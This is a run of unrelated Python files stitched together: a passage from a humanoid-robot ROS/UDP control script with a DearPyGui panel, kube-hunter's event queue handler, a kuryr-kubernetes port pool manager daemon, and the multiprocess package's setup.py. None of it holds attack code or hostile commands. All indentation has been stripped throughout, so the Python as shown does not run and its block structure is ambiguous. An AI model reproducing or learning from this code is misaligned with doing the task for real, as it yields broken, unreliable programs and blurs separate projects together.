js_meridim.header.stamp = rospy.Time.now()
js_meridim.name = ['c_chest_yaw', 'l_shoulder_pitch', 'l_shoulder_roll', 'l_elbow_yaw', 'l_elbow_pitch', 'l_hipjoint_yaw', 'l_hipjoint_roll', 'l_hipjoint_pitch', 'l_knee_pitch', 'l_ankle_pitch', 'l_ankle_roll', 'c_head_yaw', 'r_shoulder_pitch', 'r_shoulder_roll', 'r_elbow_yaw', 'r_elbow_pitch', 'r_hipjoint_yaw', 'r_hipjoint_roll', 'r_hipjoint_pitch', 'r_knee_pitch', 'r_ankle_pitch', 'r_ankle_roll']
js_meridim.position = [math.radians(r_short_data[21]/100), math.radians(r_short_data[23]/100), math.radians(r_short_data[25]/100), math.radians(r_short_data[27]/100), math.radians(r_short_data[29]/100), math.radians(r_short_data[31]/100), math.radians(r_short_data[33]/100), math.radians(r_short_data[35]/100), math.radians(r_short_data[37]/100), math.radians(r_short_data[39]/100), math.radians(r_short_data[41]/100), math.radians(r_short_data[51]/100), math.radians(r_short_data[53]/100), -math.radians(r_short_data[55]/100), -math.radians(r_short_data[57]/100), math.radians(r_short_data[59]/100), -math.radians(r_short_data[61]/100), -math.radians(r_short_data[63]/100), math.radians(r_short_data[65]/100), math.radians(r_short_data[67]/100), math.radians(r_short_data[69]/100), -math.radians(r_short_data[71]/100)]
js_meridim.velocity = []
#js_meridim.velocity = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
js_meridim.effort = []
joint_pub.publish(js_meridim)
rate.sleep()
else:
global error_count
error_count += 1
signal.signal(signal.SIGINT, signal.SIG_DFL)
#print("COUNT:",loop_count," ERROR:",error_count," ErrorRate:",'{:.02f}'.format(error_count/loop_count*100),"%")
#print("PAD:",r_short_data_disp[80])
                # build the data to send back here
s_short_data=[]
s_short_data=list(r_short_data)
global UPDATE_YAW_CENTER_FLAG
#global UPDATE_YAW_CENTER_NUM
if (UPDATE_YAW_CENTER_FLAG ==1):
UPDATE_YAW_CENTER_FLAG = 0
s_short_data[0] = UPDATE_YAW_CENTER_NUM
                #s_short_data[0]=102 # dummy data for testing
checksum[0] = 0
for i in range(MSG_SIZE-2):
checksum[0] += s_short_data[i]
checksum[0] = ~checksum[0] & 0xffff
s_short_data[MSG_SIZE-1]=checksum[0]
s_bin_data=struct.pack('90h',*s_short_data)
#r_bin_data,addr = sock.recvfrom(1472)
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
#r_short_data=struct.unpack('90h',s_bin_data)
sock.sendto(s_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
def dpgrun():
def set_yaw_center():
global UPDATE_YAW_CENTER_FLAG
UPDATE_YAW_CENTER_FLAG = 1
print("Clicked!")#ターミナルにClicked!と表示する
dpg.create_context()
dpg.create_viewport(title='Meridian Control Panel DPG', width=600, height=480)
with dpg.window(label="Axis Monitor", width=250, height=350,pos=[5,5]):
with dpg.group(label='LeftSide'):
for i in range(0, 15, 1):
dpg.add_slider_float(default_value=0, tag="ID L"+str(i),label="L"+str(i),max_value=100,min_value=-100,pos=[10,35+i*20], width=80)
with dpg.group(label='RightSide'):
for i in range(0, 15, 1):
dpg.add_slider_float(default_value=0, tag="ID R"+str(i),label="R"+str(i),max_value=100,min_value=-100,pos=[135,35+i*20], width=80)
with dpg.window(label="Messege", width=590, height=115,pos=[5,360]):
dpg.add_text(message0,tag="DispMessage0")
dpg.add_text(message1,tag="DispMessage")
with dpg.window(label="Sensor Monitor", width=335, height=175,pos=[260,5]):
with dpg.group(label='LeftSide'):
dpg.add_slider_float(default_value=0, tag="mpu0", label="ac_x",max_value=327,min_value=-327,pos=[10,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu1", label="ac_y",max_value=327,min_value=-327,pos=[115,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu2", label="ac_z",max_value=327,min_value=-327,pos=[220,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu3", label="gr_x",max_value=327,min_value=-327,pos=[10,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu4", label="gr_y",max_value=327,min_value=-327,pos=[115,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu5", label="gr_z",max_value=327,min_value=-327,pos=[220,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu6", label="mg_x",max_value=327,min_value=-327,pos=[10,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu7", label="mg_y",max_value=327,min_value=-327,pos=[115,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu8", label="mg_z",max_value=327,min_value=-327,pos=[220,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu9", label="temp",max_value=327,min_value=-327,pos=[10,95], width=60)
dpg.add_slider_float(default_value=0, tag="mpu10", label="rol",max_value=327,min_value=-327,pos=[10,120], width=60)
dpg.add_slider_float(default_value=0, tag="mpu11", label="pit",max_value=327,min_value=-327,pos=[115,120], width=60)
dpg.add_slider_float(default_value=0, tag="mpu12", label="yaw",max_value=327,min_value=-327,pos=[220,120], width=60)
dpg.add_button(label="SetYaw", callback=set_yaw_center, width =50, pos=[270,148])
with dpg.window(label="Command", width=335, height=170,pos=[260,185]):
dpg.add_text("Control Pad Monitor", pos=[10,100])
dpg.add_text("button",tag="pad_button", pos=[170,100])
dpg.add_slider_int(default_value=0, tag="pad_Lx", label="Lx",max_value=127,min_value=-127, pos=[10,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Ly", label="Ly",max_value=127,min_value=-127, pos=[90,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Rx", label="Rx",max_value=127,min_value=-127, pos=[170,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Ry", label="Ry",max_value=127,min_value=-127, pos=[250,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_L2v", label="L2v",max_value=255,min_value=0, pos=[90,140], width=40)
dpg.add_slider_int(default_value=0, tag="pad_R2v", label="R2v",max_value=255,min_value=0, pos=[170,140], width=40)
dpg.setup_dearpygui()
dpg.show_viewport()
while dpg.is_dearpygui_running():
for i in range(0, 15, 1):
global button
idld = r_short_data_disp[21+i*2]
idrd = r_short_data_disp[51+i*2]
idsensor = r_short_data_disp[i+2]/100
dpg.set_value("ID L"+str(i), idld/100)
dpg.set_value("ID R"+str(i), idrd/100)
dpg.set_value("DispMessage0", message0)
dpg.set_value("DispMessage", message1)
if i < 13:
dpg.set_value("mpu"+str(i),idsensor)
dpg.set_value("pad_button", str(r_short_data_disp[80]))
dpg.set_value("pad_Lx",-(r_short_data_disp[81]>>8&0x00ff & 0b10000000) | (r_short_data_disp[81]>>8&0x00ff & 0b01111111))
dpg.set_value("pad_Ly", -(r_short_data_disp[81]&0x00ff & 0b10000000) | (r_short_data_disp[81]&0x00ff & 0b01111111))
dpg.set_value("pad_Rx", -(r_short_data_disp[82]>>8&0x00ff & 0b10000000) | (r_short_data_disp[82]>>8&0x00ff & 0b01111111))
dpg.set_value("pad_Ry", -(r_short_data_disp[82]&0x00ff & 0b10000000) | (r_short_data_disp[82]&0x00ff & 0b01111111))
padl2val = -(r_short_data_disp[83]>>8&0x00ff & 0b10000000) | (r_short_data_disp[83]>>8&0x00ff & 0b01111111)
if (padl2val<0):
padl2val = 256+padl2val
if (r_short_data_disp[80]&256==0):
padl2val = 0
dpg.set_value("pad_L2v", padl2val)
padR2val = -(r_short_data_disp[83]&0x00ff & 0b10000000) | (r_short_data_disp[83]&0x00ff & 0b01111111)
if (padR2val<0):
padR2val = 256+padR2val
if (r_short_data_disp[80]&512==0):
padR2val = 0
dpg.set_value("pad_R2v", padR2val)
dpg.render_dearpygui_frame()
dpg.destroy_context()
if __name__ == '__main__':
thread1 = threading.Thread(target=dpgrun)
thread1.start()
main()
#try:
# joint_publisher_func()
#except rospy.ROSInterruptException:
# pass
|
handler.py
|
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
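    # Minimal usage sketch (SomeEvent and SomeHunter are hypothetical names,
    # shown only to illustrate the decorator):
    #
    #     @handler.subscribe(SomeEvent)
    #     class SomeHunter(HunterBase):
    #         """Runs whenever SomeEvent (or a subclass) is published"""
    #         def __init__(self, event):
    #             self.event = event
    #         def execute(self):
    #             ...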
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
config = get_config()
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
config = get_config()
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
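# Hedged usage sketch (the event instance below is a placeholder, not a real
# kube-hunter event): hunters publish events through the module-level queue,
# and every hook subscribed to that event type (or one of its ancestors) is
# scheduled on the worker threads.
#
#     handler.publish_event(SomeDiscoveredEvent(), caller=self)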
|
pool.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler
from six.moves.socketserver import ThreadingUnixStreamServer
from neutronclient.common import exceptions as n_exc
from oslo_config import cfg as oslo_cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr.lib._i18n import _
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base as drivers
LOG = logging.getLogger(__name__)
pool_manager_opts = [
oslo_cfg.StrOpt('sock_file',
help=_("Absolute path to socket file that "
"will be used for communication with "
"the Pool Manager daemon"),
default='/run/kuryr/kuryr_manage.sock'),
]
oslo_cfg.CONF.register_opts(pool_manager_opts, "pool_manager")
class UnixDomainHttpServer(ThreadingUnixStreamServer):
pass
class RequestHandler(BaseHTTPRequestHandler):
protocol = "HTTP/1.0"
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_POPULATE):
trunk_ips = params.get('trunks', None)
num_ports = params.get('num_ports', 1)
if trunk_ips:
try:
self._create_subports(num_ports, trunk_ips)
except Exception:
response = ('Error while populating pool {0} with {1} '
'ports.'.format(trunk_ips, num_ports))
else:
response = ('Ports pool at {0} was populated with {1} '
'ports.'.format(trunk_ips, num_ports))
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Trunk port IP(s) missing.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_FREE):
trunk_ips = params.get('trunks', None)
if not trunk_ips:
pool = "all"
else:
pool = trunk_ips
try:
self._delete_subports(trunk_ips)
except Exception:
response = 'Error freeing ports pool: {0}.'.format(pool)
else:
response = 'Ports pool belonging to {0} was freed.'.format(
pool)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def do_GET(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_LIST):
try:
pools_info = self._list_pools()
except Exception:
response = 'Error listing the pools.'
else:
response = 'Pools:\n{0}'.format(pools_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_SHOW):
raw_key = params.get('pool_key', None)
            if not raw_key or len(raw_key) != 3:
response = ('Invalid pool key. Proper format is:\n'
'[trunk_ip, project_id, [security_groups]]\n')
else:
pool_key = (raw_key[0], raw_key[1], tuple(sorted(raw_key[2])))
try:
pool_info = self._show_pool(pool_key)
except Exception:
response = 'Error showing pool: {0}.'.format(pool_key)
else:
response = 'Pool {0} ports are:\n{1}'.format(pool_key,
pool_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def _create_subports(self, num_ports, trunk_ips):
try:
drv_project = drivers.PodProjectDriver.get_instance()
drv_subnets = drivers.PodSubnetsDriver.get_instance()
drv_sg = drivers.PodSecurityGroupsDriver.get_instance()
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
project_id = drv_project.get_project({})
security_groups = drv_sg.get_security_groups({}, project_id)
subnets = drv_subnets.get_subnets([], project_id)
except TypeError:
LOG.error("Invalid driver type")
raise
for trunk_ip in trunk_ips:
try:
drv_vif_pool.force_populate_pool(
trunk_ip, project_id, subnets, security_groups, num_ports)
except n_exc.Conflict:
LOG.error("VLAN Id conflict (already in use) at trunk %s",
trunk_ip)
raise
except n_exc.NeutronClientException:
LOG.exception("Error happened during subports addition at "
"trunk: %s", trunk_ip)
raise
def _delete_subports(self, trunk_ips):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
drv_vif_pool.free_pool(trunk_ips)
except TypeError:
LOG.error("Invalid driver type")
raise
def _list_pools(self):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
available_pools = drv_vif_pool.list_pools()
except TypeError:
LOG.error("Invalid driver type")
raise
pools_info = ""
for pool_key, pool_items in available_pools.items():
pools_info += (jsonutils.dumps(pool_key) + " has "
+ str(len(pool_items)) + " ports\n")
if pools_info:
return pools_info
return "There are no pools"
def _show_pool(self, pool_key):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
pool = drv_vif_pool.show_pool(pool_key)
except TypeError:
LOG.error("Invalid driver type")
raise
if pool:
pool_info = ""
for pool_id in pool:
pool_info += str(pool_id) + "\n"
return pool_info
else:
return "Empty pool"
class PoolManager(object):
"""Manages the ports pool enabling population and free actions.
`PoolManager` runs on the Kuryr-kubernetes controller and allows to
populate specific pools with a given amount of ports. In addition, it also
allows to remove all the (unused) ports in the given pool(s), or from all
of the pool if none of them is specified.
"""
def __init__(self):
pool_manager = threading.Thread(target=self._start_kuryr_manage_daemon)
pool_manager.setDaemon(True)
pool_manager.start()
def _start_kuryr_manage_daemon(self):
LOG.info("Pool manager started")
server_address = oslo_cfg.CONF.pool_manager.sock_file
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
try:
httpd = UnixDomainHttpServer(server_address, RequestHandler)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except Exception:
LOG.exception('Failed to start Pool Manager.')
httpd.socket.close()
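# Hedged client sketch (illustrative only: the trunk IP and port count are made
# up, and the request path is assumed to be the same VIF_POOL_POPULATE constant
# that RequestHandler.do_POST matches with endswith()). It shows how a tool
# could ask the Pool Manager to populate a pool over its unix socket using only
# the standard library.
def _example_populate_pool(sock_file='/run/kuryr/kuryr_manage.sock'):
    import socket
    body = jsonutils.dumps({'trunks': ['10.0.0.6'], 'num_ports': 3})
    request = ('POST {path} HTTP/1.0\r\n'
               'Content-Length: {length}\r\n'
               '\r\n'
               '{body}').format(path=constants.VIF_POOL_POPULATE,
                                length=len(body), body=body)
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        client.connect(sock_file)
        client.sendall(request.encode())
        return client.recv(4096).decode()
    finally:
        client.close()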
|
setup.py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 2008-2016 California Institute of Technology.
# Copyright (c) 2016-2022 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/multiprocess/blob/master/LICENSE
#
# original code modified from processing/setup.py
# original: Copyright (c) 2006-2008, R Oudkerk
# original: Licence 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/multiprocess/blob/master/COPYING.txt
import re
import os
import sys
import glob
stable_version = '0.70.13'
# drop support for older python
unsupported = None
if sys.version_info < (2, 7):
unsupported = 'Versions of Python before 2.7 are not supported'
elif (3, 0) <= sys.version_info < (3, 6):
unsupported = 'Versions of Python before 3.6 are not supported'
if unsupported:
raise ValueError(unsupported)
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
is_py3k = sys.version_info[0] == 3
lt_py33 = sys.version_info < (3, 3)
# the code is version-specific, so get the appropriate root directory
root = 'pypy' if is_pypy else 'py'
pymajor,pyminor = sys.version_info[:2]
pkgdir = '%s%s.%s' % (root,pymajor,pyminor)
if sys.version_info >= (2, 6):
pkgname = 'multiprocess'
else: # (2, 5)
    pkgname = 'processing' #XXX: oddity, due to laziness at the moment
# if sys.version is higher than explicitly supported, try the latest version
HERE = os.path.dirname(os.path.abspath(__file__))
while not os.path.exists(os.path.join(HERE,'%s%s.%s' % (root,pymajor,pyminor))):
pyminor -= 1
if pyminor < 0:
unsupported = 'Python %s is not supported' % pkgdir[len(root):]
raise ValueError(unsupported)
if '%s%s.%s' % (root,pymajor,pyminor) != pkgdir:
msg = 'Warning: Python %s is not currently supported, reverting to %s.%s'
print(msg % (pkgdir[len(root):],pymajor,pyminor))
pkgdir = '%s%s.%s' % (root,pymajor,pyminor)
srcdir = '%s/Modules/_%s' % (pkgdir, pkgname)
libdir = '%s/%s' % (pkgdir, pkgname)
try:
from setuptools import setup, Extension, find_packages
has_setuptools = True
except ImportError:
from distutils.core import setup, Extension # noqa
find_packages = lambda **kwds: [pkgname, pkgname+'.dummy', pkgname+'.tests']
has_setuptools = False
from distutils import sysconfig
from distutils.errors import CCompilerError, DistutilsExecError, \
DistutilsPlatformError
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32' and sys.version_info >= (2, 6):
# distutils.msvc9compiler can raise IOError if the compiler is missing
ext_errors += (IOError, )
BUILD_WARNING = """
-----------------------------------------------------------------------
WARNING: The C extensions could not be compiled
-----------------------------------------------------------------------
Maybe you do not have a C compiler installed on this system?
The reason was:
%s
This is just a warning as most of the functionality will work even
without the updated C extension. It will simply fallback to the
built-in _multiprocessing module. Most notably you will not be able to use
FORCE_EXECV on POSIX systems. If this is a problem for you then please
install a C compiler or fix the error(s) above.
-----------------------------------------------------------------------
"""
# -*- extra config (setuptools) -*-
if has_setuptools:
extras = dict(install_requires=['dill>=0.3.4'])
else:
extras = dict()
# -*- Distribution Meta -*-
here = os.path.abspath(os.path.dirname(__file__))
meta_fh = open(os.path.join(here, '%s/__init__.py' % libdir))
try:
meta = {}
for line in meta_fh:
if line.startswith('__version__'):
version = line.split()[-1].strip("'").strip('"')
break
meta['version'] = version
finally:
meta_fh.close()
#
# Macros and libraries
#
# The `macros` dict determines the macros that will be defined when
# the C extension is compiled. Each value should be either 0 or 1.
# (An undefined macro is assumed to have value 0.) `macros` is only
# used on Unix platforms.
#
# The `libraries` dict determines the libraries to which the C
# extension will be linked. This should probably be either `['rt']`
# if you need `librt` or else `[]`.
#
# Meaning of macros
#
# HAVE_SEM_OPEN
# Set this to 1 if you have `sem_open()`. This enables the use of
# posix named semaphores which are necessary for the
# implementation of the synchronization primitives on Unix. If
# set to 0 then the only way to create synchronization primitives
# will be via a manager (e.g. "m = Manager(); lock = m.Lock()").
#
# HAVE_SEM_TIMEDWAIT
# Set this to 1 if you have `sem_timedwait()`. Otherwise polling
# will be necessary when waiting on a semaphore using a timeout.
#
# HAVE_FD_TRANSFER
# Set this to 1 to compile functions for transferring file
# descriptors between processes over an AF_UNIX socket using a
# control message with type SCM_RIGHTS. On Unix the pickling of
#     socket and connection objects depends on this feature.
#
# If you get errors about missing CMSG_* macros then you should
# set this to 0.
#
# HAVE_BROKEN_SEM_GETVALUE
# Set to 1 if `sem_getvalue()` does not work or is unavailable.
# On Mac OSX it seems to return -1 with message "[Errno 78]
# Function not implemented".
#
# HAVE_BROKEN_SEM_UNLINK
# Set to 1 if `sem_unlink()` is unnecessary. For some reason this
# seems to be the case on Cygwin where `sem_unlink()` is missing
# from semaphore.h.
#
if sys.platform == 'win32': # Windows
macros = dict()
libraries = ['ws2_32']
elif sys.platform.startswith('darwin'): # Mac OSX
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
HAVE_BROKEN_SEM_GETVALUE=1
)
libraries = []
elif sys.platform.startswith('cygwin'): # Cygwin
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=0,
HAVE_BROKEN_SEM_UNLINK=1
)
libraries = []
elif sys.platform in ('freebsd4', 'freebsd5', 'freebsd6'):
# FreeBSD's P1003.1b semaphore support is very experimental
# and has many known problems. (as of June 2008)
macros = dict( # FreeBSD 4-6
HAVE_SEM_OPEN=0,
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
)
libraries = []
elif re.match('^(gnukfreebsd(8|9|10|11)|freebsd(7|8|9|10))', sys.platform):
macros = dict( # FreeBSD 7+ and GNU/kFreeBSD 8+
HAVE_SEM_OPEN=bool(
sysconfig.get_config_var('HAVE_SEM_OPEN') and not
bool(sysconfig.get_config_var('POSIX_SEMAPHORES_NOT_ENABLED'))
),
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=1,
)
libraries = []
elif sys.platform.startswith('openbsd'):
macros = dict( # OpenBSD
HAVE_SEM_OPEN=0, # Not implemented
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
)
libraries = []
else: # Linux and other unices
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=1,
)
libraries = ['rt']
if sys.platform == 'win32':
multiprocessing_srcs = [
'%s/%s.c' % (srcdir, pkgname),
'%s/semaphore.c' % srcdir,
]
if lt_py33:
multiprocessing_srcs += [
'%s/pipe_connection.c' % srcdir,
'%s/socket_connection.c' % srcdir,
'%s/win32_functions.c' % srcdir,
]
else:
multiprocessing_srcs = [ '%s/%s.c' % (srcdir, pkgname) ]
if lt_py33:
multiprocessing_srcs.append('%s/socket_connection.c' % srcdir)
if macros.get('HAVE_SEM_OPEN', False):
multiprocessing_srcs.append('%s/semaphore.c' % srcdir)
long_description = \
'''-----------------------------------------------------------------
multiprocess: better multiprocessing and multithreading in python
-----------------------------------------------------------------
About Multiprocess
====================
``multiprocess`` is a fork of ``multiprocessing``, and is developed as part of ``pathos``:
https://github.com/uqfoundation/pathos
``multiprocessing`` is a package for the Python language which supports the
spawning of processes using the API of the standard library's
``threading`` module. ``multiprocessing`` has been distributed in the standard
library since python 2.6.
Features:
- Objects can be transferred between processes using pipes or multi-producer/multi-consumer queues.
- Objects can be shared between processes using a server process or (for simple data) shared memory.
- Equivalents of all the synchronization primitives in ``threading`` are available.
- A ``Pool`` class makes it easy to submit tasks to a pool of worker processes.
``multiprocess`` is part of ``pathos``, a python framework for heterogeneous computing.
``multiprocess`` is in active development, so any user feedback, bug reports, comments,
or suggestions are highly appreciated. A list of issues is located at https://github.com/uqfoundation/multiprocess/issues, with a legacy list maintained at https://uqfoundation.github.io/project/pathos/query.
NOTE: A C compiler is required to build the included extension module. For python 3.3 and above, a C compiler is suggested, but not required.
Major Changes
==============
- enhanced serialization, using ``dill``
Current Release
===============
This documentation is for version ``multiprocess-%(thisver)s`` (a fork of ``multiprocessing-0.70a1``).
The latest released version of ``multiprocess`` is available from::
https://pypi.org/project/multiprocess
``multiprocess`` is distributed under a 3-clause BSD license.
Development Version
===================
You can get the latest development version with all the shiny new features at::
https://github.com/uqfoundation
If you have a new contribution, please submit a pull request.
Installation
============
``multiprocess`` is packaged to install from source, so you must
download the tarball, unzip, and run the installer::
[download]
$ tar -xvzf multiprocess-%(relver)s.tgz
$ cd multiprocess-%(relver)s
$ python setup.py build
$ python setup.py install
You will be warned of any missing dependencies and/or settings
after you run the "build" step above.
Alternately, ``multiprocess`` can be installed with ``pip`` or ``easy_install``::
$ pip install multiprocess
NOTE: A C compiler is required to build the included extension module from source. For python 3.3 and above, a C compiler is suggested, but not required. Binary installs do not require a C compiler.
Requirements
============
``multiprocess`` requires::
- ``python``, **version == 2.7** or **version >= 3.6**, or ``pypy``
- ``dill``, **version >= 0.3.4**
Optional requirements::
- ``setuptools``, **version >= 40.6.0**
Basic Usage
===========
The ``multiprocess.Process`` class follows the API of ``threading.Thread``.
For example ::
from multiprocess import Process, Queue
def f(q):
q.put('hello world')
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=[q])
p.start()
print (q.get())
p.join()
Synchronization primitives like locks, semaphores and conditions are
available, for example ::
>>> from multiprocess import Condition
>>> c = Condition()
>>> print (c)
<Condition(<RLock(None, 0)>), 0>
>>> c.acquire()
True
>>> print (c)
<Condition(<RLock(MainProcess, 1)>), 0>
One can also use a manager to create shared objects either in shared
memory or in a server process, for example ::
>>> from multiprocess import Manager
>>> manager = Manager()
>>> l = manager.list(range(10))
>>> l.reverse()
>>> print (l)
[9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
>>> print (repr(l))
<Proxy[list] object at 0x00E1B3B0>
Tasks can be offloaded to a pool of worker processes in various ways,
for example ::
>>> from multiprocess import Pool
>>> def f(x): return x*x
...
>>> p = Pool(4)
>>> result = p.map_async(f, range(10))
>>> print (result.get(timeout=1))
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
When ``dill`` is installed, serialization is extended to most objects,
for example ::
>>> from multiprocess import Pool
>>> p = Pool(4)
>>> print (p.map(lambda x: (lambda y:y**2)(x) + x, xrange(10)))
[0, 2, 6, 12, 20, 30, 42, 56, 72, 90]
More Information
================
Probably the best way to get started is to look at the documentation at
http://multiprocess.rtfd.io. See ``multiprocess.examples`` for a set of example
scripts. You can also run the test suite with ``python -m multiprocess.tests``.
Please feel free to submit a ticket on github, or ask a question on
stackoverflow (**@Mike McKerns**). If you would like to share how you use
``multiprocess`` in your work, please send an email
(to **mmckerns at uqfoundation dot org**).
Citation
========
If you use ``multiprocess`` to do research that leads to publication, we ask that you
acknowledge use of ``multiprocess`` by citing the following in your publication::
M.M. McKerns, L. Strand, T. Sullivan, A. Fang, M.A.G. Aivazis,
